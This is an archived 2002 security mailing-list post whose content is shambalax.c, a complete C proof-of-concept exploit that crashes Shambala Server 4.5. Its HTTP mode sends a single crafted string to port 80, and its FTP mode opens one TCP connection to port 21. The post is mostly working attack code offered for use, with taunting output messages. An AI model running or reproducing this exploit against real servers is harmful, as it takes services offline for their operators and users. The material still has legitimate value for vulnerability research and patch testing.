|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Daniel Nyström (exce_at_netwinder.nu)
Date: Tue Jul 09 2002 - 03:46:42 CDT
DoS exploit for previously discussed issues in Shambala Server 4.5.
--/*********************************** * Daniel Nyström, Telhack 026 Inc. * ***********************************/
/******** shambalax.c ***********************************************************
* *
* PoC exploit for the DoS in Shambala Server 4.5 *
* as described in Telhack 026 Inc. S.A. #3 (BID:4897). *
* I have also built in a function that exploits another *
* DoS condition found by zillion a long long time ago. *
* Also refined my DoS a little bit by just using one *
* char that mess up Shambala. *
* *
* By: Daniel Nyström (excE) <exce
netwinder.nu> *
* *
* *
* Notes: *
* I found that zillion had only been almost right, it *
* is not opening a lot of TCP connection that generates *
* the DoS that he found, it is just one TCP connection, *
* but it certainly has to do with bad connection handling *
* by Shambala. *
* *
* *
* *
* Credits: *
* Zillion <zillionsafemode.org> - for discovering the FTP DoS *
* *
* Greetz: *
* Xenogen <***************.***> - for promising to report any segfaults :) *
* X-Rewt <***************.***> - Cuz he's in my school :P *
* Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :)) *
* *
*********************************************************** shambalax.c ********/
#include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <sys/socket.h>
int main(int argc, char *argv[]) { int sockfd; int port; int numbytes; struct sockaddr_in target; struct hostent *he;
if (argc != 3) { fprintf(stderr, "\n-- Shambala Server 4.5 DoS exploit --\n"); fprintf(stderr, "\nUsage: %s <target> <type>", argv[0]); fprintf(stderr, "\nTypes:"); fprintf(stderr, "\n1 - HTTPD DoS"); fprintf(stderr, "\n2 - FTP DoS\n\n"); exit(1); } printf("\n-- Shambala Server 4.5 DoS exploit --\n\n"); printf("-> Starting...\n"); printf("->\n");
if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(1); }
if ((sockfd=socket(AF_INET, SOCK_STREAM,0)) == -1) { perror("socket"); exit(1); }
/* HTTPD DoS */ if(argv[2][0] == '1') { port = 80; target.sin_family = AF_INET; target.sin_port = htons(port); target.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(target.sin_zero), 8); printf("-> Connecting to %s:80...\n", inet_ntoa(target.sin_addr)); printf("->\n"); if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1) { perror("connect"); exit(1); } printf("-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\n"); printf("->\n"); if(send(sockfd, "!\r\n", 3, 0) == -1) { perror("send"); exit(1); } close(sockfd); } else /* FTPD DoS */ if(argv[2][0] == '2') { port = 21; target.sin_family = AF_INET; target.sin_port = htons(port); target.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(target.sin_zero), 8); printf("-> Making a TCP connection (!which crashes server!) to %s:21...\n", inet_ntoa(target.sin_addr)); printf("->\n"); if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1) { perror("connect"); exit(1); } close(sockfd); } else { fprintf(stderr, "\n\nError: Bad type definition (use 1 or 2 for <type>).\n\n"); exit(1); }
printf("-> Exploit finished nicely. %s's Shambala is probably dead by now.\n\n", argv[1]);
}
/* EOF - Shambala Server 4.5 DoS exploit */
/* Daniel Nyström (excE) <excenetwinder.nu> */
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]